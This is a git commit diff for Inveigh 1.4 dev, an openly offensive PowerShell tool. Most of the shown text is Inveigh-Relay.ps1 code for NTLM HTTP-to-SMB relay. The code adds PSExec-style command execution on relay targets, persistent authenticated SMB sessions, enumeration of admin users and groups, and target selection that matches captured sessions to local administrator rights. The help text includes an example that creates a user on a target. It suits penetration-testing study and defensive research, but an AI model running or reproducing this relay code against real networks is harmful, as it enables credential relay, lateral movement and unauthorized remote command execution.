aboutsummaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorKevin Robertson <robertsonk@gmail.com>2018-07-10 09:54:52 -0400
committerKevin Robertson <robertsonk@gmail.com>2018-07-10 09:54:52 -0400
commite424cb858cfa765c057384b7daba9360624b82a0 (patch)
treef4c2aa6cdb603ff07a0b4455009295a927268b7b
parent3f070816e7b54b83aac16b8e7985017199e5cc08 (diff)
downloadInveigh-e424cb858cfa765c057384b7daba9360624b82a0.tar.gz
Inveigh-e424cb858cfa765c057384b7daba9360624b82a0.zip
Inveigh 1.4 dev update
Invoke-Inveigh - Added ADIDNS spoofing combo and wildcard attacks. Removed dynamic updates combo attack. Invoke-InveighRelay - Latest revision of the new multi-host targeting system. I haven't yet had a chance to create a tool for importing CSV files from bloodhound. I was able to match up the data formatting though.
Diffstat
-rw-r--r--Inveigh-Relay.ps11375
-rw-r--r--Inveigh.ps11875
-rw-r--r--Invoke-DNSUpdate.ps11437
3 files changed, 2328 insertions, 2359 deletions
diff --git a/Inveigh-Relay.ps1 b/Inveigh-Relay.ps1
index 6486301..9b61ff7 100644
--- a/Inveigh-Relay.ps1
+++ b/Inveigh-Relay.ps1
@@ -2,20 +2,13 @@ function Invoke-InveighRelay
{
<#
.SYNOPSIS
-This function performs NTLMv2 HTTP to SMB relay with psexec style command execution.
+This function performs NTLMv1/NTLMv2 HTTP to SMB relay.
.DESCRIPTION
-Invoke-InveighRelay currently supports NTLMv2 HTTP to SMB2.1 relay with psexec style command execution.
-
- HTTP/HTTPS to SMB NTLMv2 relay with granular control
- Supports SMB2.1 targets
- Does not require priveleged access on the Invoke-InveighRelay host
- The Invoke-InveighRelay host can be targeted for privilege escalation
- NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS
- Granular control of console and file output
+This function performs NTLMv1/NTLMv2 HTTP to SMB relay.
.PARAMETER Attack
-Default = not sure yet: (Enumerate/Execute/Session) Comma seperated list of attacke to perform with relay. Enumerate
+Default = not sure yet: (Enumerate/Execute/Session) Comma seperated list of attacks to perform with relay. Enumerate
leverages relay to perform enumeration on target systems. The collected data is used for target selection.
Execute performs PSExec style command execution. Session creates and maintains authenticated SMB sessions that
can be interacted with through Invoke-TheHash's Invoke-SMBClient, Invoke-SMBEnum, and Invoke-SMBExec.
@@ -43,6 +36,19 @@ displaying full capture lists when running through a shell that does not have ac
Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname,
and username combinations when real time console output is enabled.
+.PARAMETER Enumerate
+
+.PARAMETER EnumerateGroup
+
+.PARAMETER EnumerateRepeat
+
+.PARAMETER Execute
+Command to execute on relay target. Use PowerShell character escapes where necessary.
+
+.PARAMETER ExecuteRepeat
+
+.PARAMETER FailedAuthLimit
+
.PARAMETER FileOutput
Default = Disabled: (Y/N) Enable/Disable real time file output.
@@ -126,6 +132,14 @@ Default = Enable: (Y/N) Enable/Disable automaticaly exiting after a relay is dis
.PARAMETER Service
Default = 20 Character Random: Name of the service to create and delete on the target.
+.PARAMETER SessionLimitPriv
+
+.PARAMETER SessionLimitShare
+
+.PARAMETER SessionLimitUnpriv
+
+.PARAMETER SessionRefresh
+
.PARAMETER ShowHelp
Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
@@ -145,6 +159,11 @@ selection and filter out invalid targets. Something like a /16 with only a few h
Comma separated list of IP addresses to exlude from the target list. This parameter will accept single addresses,
CIDR, or ranges on the format of 192.168.0.1-192.168.0.10.
+.PARAMETER TargetRandom
+Default = Enabled: (Y/N) Enable/Disable selecting a random target is a target is not found through logic.
+
+.PARAMETER TargetRefresh
+
.PARAMETER Tool
Default = 0: (0/1/2) Enable/Disable features for better operation through external tools such as Meterpreter's
PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and Empire.
@@ -171,11 +190,16 @@ Invoke-InveighRelay -Target 192.168.2.55 -Command "net user Inveigh Spring2017 /
https://github.com/Kevin-Robertson/Inveigh
#>
+#region begin parameters
+
# Parameter default values can be modified in this section:
[CmdletBinding()]
param
(
[parameter(Mandatory=$false)][ValidateSet("Enumerate","Session","Execute")][Array]$Attack = ("Enumerate","Session"),
+ [parameter(Mandatory=$false)][ValidateSet("All","NetSession","Share","User","Group")][String]$Enumerate = "All",
+ [parameter(Mandatory=$false)][ValidateSet("Random","Strict")][String]$TargetMode = "Random",
+ [parameter(Mandatory=$false)][String]$EnumerateGroup = "Administrators",
[parameter(Mandatory=$true)][Array]$Target = "",
[parameter(Mandatory=$false)][Array]$TargetExclude = "",
[parameter(Mandatory=$false)][Array]$HTTPResetDelay = "Firefox",
@@ -184,16 +208,19 @@ param
[parameter(Mandatory=$false)][Array]$WPADAuthIgnore = "",
[parameter(Mandatory=$false)][Int]$ConsoleQueueLimit = "-1",
[parameter(Mandatory=$false)][Int]$ConsoleStatus = "",
+ [parameter(Mandatory=$false)][Int]$FailedAuthLimit = "2",
[parameter(Mandatory=$false)][Int]$HTTPPort = "80",
[parameter(Mandatory=$false)][Int]$HTTPSPort = "443",
[parameter(Mandatory=$false)][Int]$HTTPResetDelayTimeout = "30",
[parameter(Mandatory=$false)][Int]$ProxyPort = "8492",
[parameter(Mandatory=$false)][Int]$RunTime = "",
+ [parameter(Mandatory=$false)][Int]$SessionLimitPriv = "2",
[parameter(Mandatory=$false)][Int]$SessionLimitShare = "10",
[parameter(Mandatory=$false)][Int]$SessionLimitUnpriv = "0",
- [parameter(Mandatory=$false)][Int]$SessionLimitPriv = "2",
[parameter(Mandatory=$false)][Int]$SessionRefresh = "10",
- [parameter(Mandatory=$false)][Object]$Source,
+ [parameter(Mandatory=$false)][Int]$TargetRefresh = "60",
+ [parameter(Mandatory=$false)][Int]$RepeatEnumerate = "10",
+ [parameter(Mandatory=$false)][Int]$RepeatExecute = "10",
[parameter(Mandatory=$false)][String]$Command = "",
[parameter(Mandatory=$false)][String]$HTTPSCertIssuer = "Inveigh",
[parameter(Mandatory=$false)][String]$HTTPSCertSubject = "localhost",
@@ -211,7 +238,6 @@ param
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$RelayAutoDisable = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$RelayAutoExit = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SessionPriority = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SigningCheck = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y",
@@ -225,6 +251,9 @@ param
[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
)
+#endregion
+#region begin initialization
+
if ($invalid_parameter)
{
Write-Output "[-] $($invalid_parameter) is not a valid parameter."
@@ -234,8 +263,18 @@ if ($invalid_parameter)
$inveigh_version = "1.4 Dev"
if($ProxyIP -eq '0.0.0.0')
-{
+{
+
+ try
+ {
$proxy_WPAD_IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
+ }
+ catch
+ {
+ Write-Output "[-] Error finding proxy IP, specify manually with -ProxyIP"
+ throw
+ }
+
}
if($Attack -contains 'Execute' -and !$Command)
@@ -269,16 +308,17 @@ if(!$inveigh)
$inveigh.requested_host_list = New-Object System.Collections.ArrayList
$inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
$inveigh.DNS_list = New-Object System.Collections.ArrayList
- $inveigh.relay_privilege_table = [HashTable]::Synchronized(@{})
$inveigh.relay_failed_auth_table = [HashTable]::Synchronized(@{})
$inveigh.relay_history_table = [HashTable]::Synchronized(@{})
$inveigh.session_socket_table = [HashTable]::Synchronized(@{})
$inveigh.session_table = [HashTable]::Synchronized(@{})
$inveigh.session_message_ID_table = [HashTable]::Synchronized(@{})
$inveigh.session_lock_table = [HashTable]::Synchronized(@{})
+ $inveigh.domain_mapping_table = [HashTable]::Synchronized(@{})
+ $inveigh.group_table = [HashTable]::Synchronized(@{})
$inveigh.session_count = 0
$inveigh.session_list = @()
- $inveigh.enumeration_list = @()
+ $inveigh.enumeration_data = @()
}
if($inveigh.relay_running)
@@ -287,6 +327,8 @@ if($inveigh.relay_running)
throw
}
+$inveigh.stop = $false
+
if(!$inveigh.running)
{
$inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList
@@ -404,7 +446,8 @@ if($inveigh.running)
$inveigh.output_pause = $true
}
-# Write startup messages
+#endregion
+#region begin startup messages
$inveigh.output_queue.Add("[*] Inveigh Relay $inveigh_version started at $(Get-Date -format s)") > $null
if($firewall_status)
@@ -596,6 +639,8 @@ if($Proxy -eq 'Y')
}
+$inveigh.output_queue.Add("[+] Relay Attack = " + ($Attack -join ",")) > $null
+
if($Target.Count -eq 1)
{
$inveigh.output_queue.Add("[+] Relay Target = " + ($Target -join ",")) > $null
@@ -971,12 +1016,33 @@ while($inveigh.output_queue.Count -gt 0)
}
+$inveigh.netBIOS_domain = (Get-ChildItem -path env:userdomain).Value
+$inveigh.computer_name = (Get-ChildItem -path env:computername).Value
+
+try
+{
+ $inveigh.DNS_domain = ((Get-ChildItem -path env:userdnsdomain).Value).ToLower()
+ $inveigh.DNS_computer_name = ($inveigh.computer_name + "." + $inveigh.DNS_domain).ToLower()
+
+ if(!$inveigh.domain_mapping_table.ContainsKey($inveigh.netBIOS_domain))
+ {
+ $inveigh.domain_mapping_table.Add($inveigh.netBIOS_domain,$inveigh.DNS_domain)
+ }
+
+}
+catch
+{
+ $inveigh.DNS_domain = $inveigh.netBIOS_domain
+ $inveigh.DNS_computer_name = $inveigh.computer_name
+}
+
if($inveigh.running)
{
$inveigh.output_pause = $false
}
-# Begin ScriptBlocks
+#endregion
+#region begin script blocks
# Shared Basic Functions ScriptBlock
$shared_basic_functions_scriptblock =
@@ -1993,27 +2059,112 @@ $SMB_relay_functions_scriptblock =
$NTLM_challenge = $payload.SubString(($NTLM_index + 48),16)
}
+ $target_name_length = Get-UInt16DataLength (($NTLM_index + 24) / 2) $payload_bytes
+ $negotiate_flags = [System.Convert]::ToInt16(($payload.SubString(($NTLM_index + 44),2)),16)
+ $negotiate_flags = [Convert]::ToString($negotiate_flags,2)
+ $target_info_flag = $negotiate_flags.SubString(0,1)
+
+ if($target_info_flag -eq 1)
+ {
+ $target_info_index = ($NTLM_index + 80) / 2
+ $target_info_index = $target_info_index + $target_name_length + 16
+ $target_info_item_type = $payload_bytes[$target_info_index]
+ $i = 0
+
+ while($target_info_item_type -ne 0 -and $i -lt 10)
+ {
+ $target_info_item_length = Get-UInt16DataLength ($target_info_index + 2) $payload_bytes
+
+ switch($target_info_item_type)
+ {
+
+ 2
+ {
+ $netBIOS_domain_name = Convert-DataToString ($target_info_index + 4) $target_info_item_length $payload_bytes
+ }
+
+ 3
+ {
+ $DNS_computer_name = Convert-DataToString ($target_info_index + 4) $target_info_item_length $payload_bytes
+ }
+
+ 4
+ {
+ $DNS_domain_name = Convert-DataToString ($target_info_index + 4) $target_info_item_length $payload_bytes
+ }
+
+ }
+
+ $target_info_index = $target_info_index + $target_info_item_length + 4
+ $target_info_item_type = $payload_bytes[$target_info_index]
+ $i++
+ }
+
+ if($netBIOS_domain_name -and $DNS_domain_name -and !$inveigh.domain_mapping_table.ContainsKey($netBIOS_domain_name) -and $netBIOS_domain_name -ne $DNS_domain_name)
+ {
+ $inveigh.domain_mapping_table.Add($netBIOS_domain_name,$DNS_domain_name)
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] Domain mapping added for $netBIOS_domain_name to $DNS_domain_name") > $null
+ }
+
+ $target_index = $inveigh.enumeration_data | Where-Object {$_.IP -eq $target} | Select-Object -expand Index
+
+ if($inveigh.enumeration_data | Where-Object {$_.IP -eq $target -and !$_.Hostname})
+ {
+ $inveigh.enumeration_data[$target_index].Hostname = $DNS_computer_name
+ }
+ elseif($inveigh.enumeration_data[$target_index].Hostname -ne $DNS_computer_name)
+ {
+
+ if($inveigh.enumeration_data | Where-Object {$_.Hostname -eq $DNS_computer_name})
+ {
+ $target_hostname_index = $inveigh.enumeration_data | Where-Object {$_.Hostname -eq $DNS_computer_name} | Select-Object -expand Index
+ $inveigh.enumeration_data[$target_hostname_index].IP = $target
+ $inveigh.enumeration_data[$target_index].IP = $null
+ }
+ else
+ {
+ $inveigh.enumeration_data += New-RelayEnumObject -IP $target -Hostname $DNS_computer_name -SMBServer $true -Targeted $(Get-Date -format s)
+ }
+
+ }
+
+ }
+
return $NTLM_challenge
}
function New-RelayEnumObject
{
- param ($IP,$Targeted,$Sessions,$AdministratorUsers,$AdministratorGroups,$Shares,$NetSessions,$LocalUsers,$SMB2,$Signing,$SMBServer,$LastActivity)
+ param ($IP,$Hostname,$Sessions,$AdministratorUsers,$AdministratorGroups,$Privileged,$Shares,$NetSessions,$NetSessionsMapped,
+ $LocalUsers,$SMB2,$Signing,$SMBServer,$Targeted,$Enumerate,$Execute)
+
+ if($Sessions -and $Sessions -isnot [Array]){$Sessions = @($Sessions)}
+ if($AdministratorUsers -and $AdministratorUsers -isnot [Array]){$AdministratorUsers = @($AdministratorUsers)}
+ if($AdministratorGroups -and $AdministratorGroups -isnot [Array]){$AdministratorGroups = @($AdministratorGroups)}
+ if($Privileged -and $Privileged -isnot [Array]){$Privileged = @($Privileged)}
+ if($Shares -and $Shares -isnot [Array]){$Shares = @($Shares)}
+ if($NetSessions -and $NetSessions -isnot [Array]){$NetSessions = @($NetSessions)}
+ if($NetSessionsMapped -and $NetSessionsMapped -isnot [Array]){$NetSessionsMapped = @($NetSessionsMapped)}
+ if($LocalUsers -and $LocalUsers -isnot [Array]){$LocalUsers = @($LocalUsers)}
$relay_object = New-Object PSObject
- Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Index" $inveigh.enumeration_list.Count
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Index" $inveigh.enumeration_data.Count
Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "IP" $IP
- Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Targeted" $Targeted
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Hostname" $Hostname
Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Sessions" $Sessions
Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Administrator Users" $AdministratorUsers
Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Administrator Groups" $AdministratorGroups
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Privileged" $Privileged
Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Shares" $Shares
Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "NetSessions" $NetSessions
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "NetSessions Mapped" $NetSessionsMapped
Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Local Users" $LocalUsers
Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "SMB2.1" $SMB2
Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Signing" $Signing
Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "SMB Server" $SMBServer
- Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Last Activity" $LastActivity
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Targeted" $Targeted
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Enumerate" $Enumeration
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Execute" $Execution
return $relay_object
}
@@ -2031,8 +2182,27 @@ $SMB_relay_functions_scriptblock =
$SMB_port_test_success = $SMB_target_test_result.AsyncWaitHandle.WaitOne(100,$false)
$SMB_target_test.Close()
- return $SMB_port_test_success
+ if($SMB_port_test_success)
+ {
+ $SMB_server = $true
+ }
+ else
+ {
+ $SMB_server = $false
+ }
+ if($inveigh.enumeration_data | Where-Object {$_.IP -eq $target})
+ {
+ $target_index = $inveigh.enumeration_data | Where-Object {$_.IP -eq $target} | Select-Object -expand Index
+ $inveigh.enumeration_data[$target_index]."SMB Server" = $SMB_server
+ $inveigh.enumeration_data[$target_index]."Targeted" = $(Get-Date -format s)
+ }
+ else
+ {
+ $inveigh.enumeration_data += New-RelayEnumObject -IP $target -SMBServer $SMB_server -Targeted $(Get-Date -format s)
+ }
+
+ return $SMB_port_test_success
}
function Invoke-SMBNegotiate
@@ -2095,11 +2265,6 @@ $SMB_relay_functions_scriptblock =
$SMB_client.Close()
$stage = 'Exit'
}
- elseif($signing_check) # check
- {
- $SMB_client.Close()
- $stage = 'Exit'
- }
else
{
$signing = $false
@@ -2133,226 +2298,352 @@ $SMB_relay_functions_scriptblock =
return $SMB_client,$SMB2,$signing
}
- if($inveigh.target_list -gt 1)
+ function Test-SMBTarget
{
- $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Selecting a target") > $null
- }
+ param($targets,$limit)
- try
- {
- $target = $null
- $initiator_sessions = $inveigh.enumeration_list | Where-Object {$_.IP -eq $SourceIP -and $_.Sessions} | Select-Object -expand Sessions
$filter_date = Get-Date
- $targets_excluded = $inveigh.enumeration_list | Where-Object {$_.IP -eq $SourceIP -or ($_.Targeted -and !$_."SMB2.1" -or $_.Signing) -or ($_.Targeted -and !$_."SMB Server" -and (New-TimeSpan $_."Last Activity" $filter_date).Minutes -lt 10)} | Select-Object -expand IP
-
+ $targets_excluded = $inveigh.enumeration_data | Where-Object {$_.IP -eq $SourceIP -or ($_.Targeted -and $_."SMB Server" -and (!$_."SMB2.1" -or $_.Signing)) -or
+ ($_.Targeted -and !$_."SMB Server" -and (New-TimeSpan $_.Targeted $filter_date).Minutes -lt $TargetRefresh)} | Select-Object -expand IP
+
if($targets_excluded)
{
- $targets_filtered = Compare-Object -ReferenceObject $targets_excluded -DifferenceObject $inveigh.target_list -PassThru # check
- }
- else
- {
- $targets_filtered = $inveigh.target_list
- }
+ $targets = Compare-Object -ReferenceObject $targets -DifferenceObject $targets_excluded -PassThru | Where-Object {$_.SideIndicator -eq "<="}
- if($initiator_sessions)
- {
- ForEach($session in $initiator_sessions)
+ if($targets -and $inveigh.relay_history_table.$SourceIP -and
+ (Compare-Object -ReferenceObject $targets -DifferenceObject $inveigh.relay_history_table.$SourceIP | Where-Object {$_.SideIndicator -eq "<="}))
{
- $targets = $inveigh.enumeration_list | Where-Object {$_."Administrator Users" -contains $session} | Select-Object -expand IP
-
- if($targets)
+ [Array]$targets = Compare-Object -ReferenceObject $targets -DifferenceObject $inveigh.relay_history_table.$SourceIP -PassThru | Where-Object {$_.SideIndicator -eq "<="}
+ }
+ elseif($targets -and ($inveigh.session_list | Where-Object {$_.Status}))
+ {
+ $targets_temp = $targets
+ $targets = @()
+
+ ForEach($target_entry in $targets_temp)
{
- $targets = Compare-Object -ReferenceObject $targets -DifferenceObject $targets_filtered -IncludeEqual -ExcludeDifferent -PassThru
+ $sessions = @($inveigh.session_list | Where-Object {$_.Target -eq $target_entry -and $_.Status -eq 'connected'})
- if($targets -and (Compare-Object -ReferenceObject $targets -DifferenceObject $inveigh.relay_history_table.$SourceIP | Where-Object {$_.SideIndicator -eq "<="}))
+ if($sessions -and $sessions.Count -lt $limit)
{
- $targets = Compare-Object -ReferenceObject $targets -DifferenceObject $inveigh.relay_history_table.$SourceIP -PassThru | Where-Object {$_.SideIndicator -eq "<="}
- }
- else
- {
- $targets_temp = $targets
- $targets = @()
-
- ForEach($target_entry in $targets_temp)
- {
- [Array]$sessions = $inveigh.session_list | Where-Object {$_.Target -eq $target_entry -and $_.Status -eq 'connected'}
-
- if($sessions.Count -lt $SessionLimitPriv)
- {
- $targets += $target_entry
- }
-
- }
-
+ $targets += $target_entry
}
}
-
+
if(!$targets)
{
- $targets = $inveigh.enumeration_list | Where-Object {$_."Shares".Count -gt 0} | Select-Object -expand IP
- if($targets)
+ ForEach($target_entry in $targets_temp)
{
- $targets = Compare-Object -ReferenceObject $targets -DifferenceObject $targets_filtered -IncludeEqual -ExcludeDifferent -PassThru
+ $sessions = @($inveigh.session_list | Where-Object {$_.Target -eq $target_entry -and $_.Status -eq 'disconnected'})
- if($targets -and (Compare-Object -ReferenceObject $targets -DifferenceObject $inveigh.relay_history_table.$SourceIP | Where-Object {$_.SideIndicator -eq "<="}))
+ if($sessions)
{
- $targets = Compare-Object -ReferenceObject $targets -DifferenceObject $inveigh.relay_history_table.$SourceIP -PassThru | Where-Object {$_.SideIndicator -eq "<="}
- }
- else
- {
- $targets = $null
+ $targets += $target_entry
}
}
+
+ }
+ }
+
+ }
+
+ $i = 0
+ $random_index_history = @()
+
+ while(!$target -and $i -lt $targets.Count)
+ {
+ $i++
+
+ if($targets.Count -eq 1)
+ {
+ $target = $targets[0]
+ }
+ else
+ {
+ $random_range = 0..($targets.Count - 1)
+ $random_range_filtered = $random_range | Where-Object {$random_index_history -notcontains $_}
+
+ if($random_range_filtered)
+ {
+ $random_index = Get-Random -InputObject $random_range_filtered
+ $random_index_history += $random_index
+ $target = $targets[$random_index]
}
-
- if($targets)
+
+ }
+
+ if(!($target -as [IPAddress]) -as [Bool])
+ {
+
+ try
{
- $targets_temp = $targets
+ $target = [System.Net.Dns]::GetHostEntry($target).AddressList[0].IPAddressToString
- ForEach($target_entry in $targets_temp)
+ if($target.IsIPv6LinkLocal)
{
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] IPv6 target $target not supported") > $null
+ $target = $null
+ }
+
+ }
+ catch
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] DNS lookup for $target failed") > $null
+ $target = $null
+ }
+
+ }
- if($inveigh.target_list -notcontains $target_entry)
- {
- $targets.remove($target_entry)
- }
+ if($target -eq $SourceIP)
+ {
+ $target = $null
+ }
- }
+ if($target)
+ {
+ $SMB_port_test_success = Test-SMBPort $target
- if($targets)
+ if($SMB_port_test_success)
+ {
+ $SMB_negotiate = Invoke-SMBNegotiate $target
+ $SMB_client = $SMB_negotiate[0]
+ $SMB2 = $SMB_negotiate[1]
+ $signing = $SMB_negotiate[2]
+ $SMB_server = $true
+ $target_index = $inveigh.enumeration_data | Where-Object {$_.IP -eq $target} | Select-Object -expand Index
+ $inveigh.enumeration_data[$target_index]."SMB2.1" = $SMB2
+ $inveigh.enumeration_data[$target_index].Signing = $signing
+ $inveigh.enumeration_data[$target_index]."SMB Server" = $SMB_server
+ $inveigh.enumeration_data[$target_index]."Targeted" = $(Get-Date -format s)
+
+ if(!$SMB2 -and $signing)
{
- $i = 0
- $random_index_history = @()
+ $target = $null
+ }
- while(!$target -and $i -lt $targets.Count)
- {
- $i++
+ }
+ else
+ {
+ $target = $null
+ }
- if($targets.Count -eq 1)
- {
- $target = $targets[0]
- }
- else
- {
- $random_range = 0..($targets.Count - 1)
- $random_range_filtered = $random_range | Where-Object {$random_index_history -notcontains $_}
+ }
+
+ }
- if($random_range_filtered)
- {
- $random_index = Get-Random -InputObject $random_range_filtered
- $random_index_history += $random_index
- $target = $targets[$random_index]
- }
+ return $SMB_client,$target
+ }
- }
+ if($inveigh.target_list -gt 1)
+ {
+ $inveigh.output_queue.Add("[*] [$(Get-Date -format s)] Selecting a target") > $null
+ }
- $SMB_port_test_success = Test-SMBPort $target
+ if(!($inveigh.enumeration_data | Where-Object {$_.IP -eq $SourceIP}))
+ {
+
+ try
+ {
+ $source_hostname = [System.Net.Dns]::GetHostEntry($SourceIP).HostName
+ }
+ catch
+ {
+ $inveigh.output_queue.Add("[-] [$(Get-Date -format s)] DNS reverse lookup for $SourceIP failed") > $null
+ }
- if($SMB_port_test_success)
- {
- $SMB_negotiate = Invoke-SMBNegotiate $target
- $SMB_client = $SMB_negotiate[0]
- $SMB2 = $SMB_negotiate[1]
- $signing = $SMB_negotiate[2]
- $SMB_server = $true
- }
- else
- {
- $SMB2 = $null
- $signing = $null
- $SMB_server = $false
- $target = $null
- }
+ }
- $target_index = $inveigh.enumeration_list | Where-Object {$_.IP -eq $target} | Select-Object -expand Index
- $inveigh.enumeration_list[$target_index].Targeted = $true
- $inveigh.enumeration_list[$target_index]."SMB2.1" = $SMB2
- $inveigh.enumeration_list[$target_index].Signing = $signing
- $inveigh.enumeration_list[$target_index]."SMB Server" = $SMB_server
- $inveigh.enumeration_list[$target_index]."Last Activity" = $(Get-Date -format s)
- }
+ try
+ {
+ $targets = $null
+ $target = $null
+ $initiator_sessions = $inveigh.enumeration_data | Where-Object {($_.IP -eq $SourceIP -or $_.Hostname -eq $source_hostname) -and $_.Sessions} | Select-Object -expand Sessions
+
+ # check if sessions match any local admin group members
+ if($initiator_sessions)
+ {
+
+ ForEach($session in $initiator_sessions)
+ {
+ $target_hostnames = $inveigh.enumeration_data | Where-Object {$_."Administrator Users" -contains $session -and !$_.IP} | Select-Object -expand Hostname
+
+ if($target_hostnames)
+ {
+ $SMB_target_results = Test-SMBTarget $target_hostnames $SessionLimitPriv
+ $SMB_client = $SMB_target_results[0]
+ $target = $SMB_target_results[1]
+ }
+ else
+ {
+ $targets = $inveigh.enumeration_data | Where-Object {$_."Administrator Users" -contains $session -and $_.IP} | Select-Object -expand IP
+ if($targets)
+ {
+ $SMB_target_results = Test-SMBTarget $targets $SessionLimitPriv
+ $SMB_client = $SMB_target_results[0]
+ $target = $SMB_target_results[1]
}
-
+
}
}
}
- $i = 0
- $random_index_history = @()
-
- while(!$target -and $i -lt $targets_filtered.Count)
+ # check if sessions belong to groups that match any local admin group members
+ if($initiator_sessions -and !$targets -and $target)
{
- $i++
- $random_range = 0..($targets_filtered.Count - 1)
- $random_range_filtered = $random_range | Where-Object {$random_index_history -notcontains $_}
- if($random_range_filtered)
+ function Get-SessionGroup
{
- $random_index = Get-Random -InputObject $random_range_filtered
- $random_index_history += $random_index
- $target = $targets_filtered[$random_index]
- $SMB_port_test_success = $false
- }
+ param($session)
- if($target -and $target -ne $SourceIP -and $inveigh.relay_history_table.$SourceIP -notcontains $target)
- {
- $SMB_port_test_success = Test-SMBPort $target
+ $group_list = @()
- if($SMB_port_test_success)
+ ForEach($group in $inveigh.group_table.keys)
{
- $SMB_server = $true
- $SMB_negotiate = Invoke-SMBNegotiate $target
- $SMB_client = $SMB_negotiate[0]
- $SMB2 = $SMB_negotiate[1]
- $signing = $SMB_negotiate[2]
+
+ if($inveigh.group_table.$group -contains $session)
+ {
+ $group_list += $group
+ }
+
}
- else
+
+ For($i=0;$i -lt $group_list.Count;$i++)
{
- $SMB_server = $false
+
+ ForEach($group in $inveigh.group_table.keys)
+ {
+
+ if($inveigh.group_table.$group -contains $group_list[$i])
+ {
+ $group_list += $group
+ }
+
+ }
+
}
- if($inveigh.enumeration_list | Where-Object {$_.IP -eq $target})
+ return $group_list
+ }
+
+ ForEach($session in $initiator_sessions)
+ {
+ $session_groups += Get-SessionGroup $session
+ }
+
+ ForEach($group in $session_groups)
+ {
+ $target_hostnames = $inveigh.enumeration_data | Where-Object {$_."Administrator Groups" -contains $group -and !$_.IP} | Select-Object -expand Hostname
+
+ if($target_hostnames)
{
- $target_index = $inveigh.enumeration_list | Where-Object {$_.IP -eq $target} | Select-Object -expand Index
- $inveigh.enumeration_list[$target_index].Targeted = $true
- $inveigh.enumeration_list[$target_index]."Last Activity" = $(Get-Date -format s)
+ $SMB_target_results = Test-SMBTarget $target_hostnames $SessionLimitPriv
+ $SMB_client = $SMB_target_results[0]
+ $target = $SMB_target_results[1]
}
else
{
- $inveigh.enumeration_list += New-RelayEnumObject -IP $target -Targeted $true -SMB2 $SMB2 -Signing $signing -SMBServer $SMB_server -LastActivity $(Get-Date -format s)
- }
+ $targets = $inveigh.enumeration_data | Where-Object {$_."Administrator Groups" -contains $group -and $_.IP} | Select-Object -expand IP
+
+ if($targets)
+ {
+ $SMB_target_results = Test-SMBTarget $targets $SessionLimitPriv
+ $SMB_client = $SMB_target_results[0]
+ $target = $SMB_target_results[1]
+ }
- if(!$SMB2 -or $signing -or !$SMB_port_test_success)
- {
- $target = $null
}
- else
+
+ }
+
+ }
+
+ # check if mapped netsession match any local admin group members
+ if(!$targets -and !$target)
+ {
+ $initiator_mapped_net_sessions = $inveigh.enumeration_data | Where-Object {($_.IP -eq $SourceIP -or $_.Hostname -eq $source_hostname) -and $_."NetSessions Mapped"} | Select-Object -expand "NetSessions Mapped"
+
+ if($initiator_mapped_net_sessions)
+ {
+
+ ForEach($session in $initiator_mapped_net_sessions)
{
+ $target_hostnames = $inveigh.enumeration_data | Where-Object {($_."Administrator Users" -like "$session@*" -or $_."Administrator Users" -like "*\$session") -and !$_.IP} | Select-Object -expand Hostname
- if(!$inveigh.relay_history_table.$SourceIP)
+ if($target_hostnames)
{
- $inveigh.relay_history_table.Add($SourceIP,[Array]$target)
+ $SMB_target_results = Test-SMBTarget $target_hostnames $SessionLimitPriv
+ $SMB_client = $SMB_target_results[0]
+ $target = $SMB_target_results[1]
}
- elseif($inveigh.relay_history_table.$SourceIP -notcontains $target)
+ else
{
- $inveigh.relay_history_table.$SourceIP += $target
+ $targets = $inveigh.enumeration_data | Where-Object {($_."Administrator Users" -like "$session@*" -or $_."Administrator Users" -like "*\$session") -and $_.IP} | Select-Object -expand IP
+
+ if($targets)
+ {
+ $SMB_target_results = Test-SMBTarget $targets $SessionLimitPriv
+ $SMB_client = $SMB_target_results[0]
+ $target = $SMB_target_results[1]
+ }
+
}
}
}
- else
+
+ }
+
+ # check if source IP matches any netsessions
+ if(!$targets -and !$target -and $SourceIP)
+ {
+ $targets = $inveigh.enumeration_data | Where-Object {$_."NetSession" -contains $SourceIP} | Select-Object -expand IP
+
+ if($targets)
{
- $target = $null
+ $SMB_target_results = Test-SMBTarget $target $SessionLimitUnpriv
+ $SMB_client = $SMB_target_results[0]
+ $target = $SMB_target_results[1]
}
-
+
+ }
+
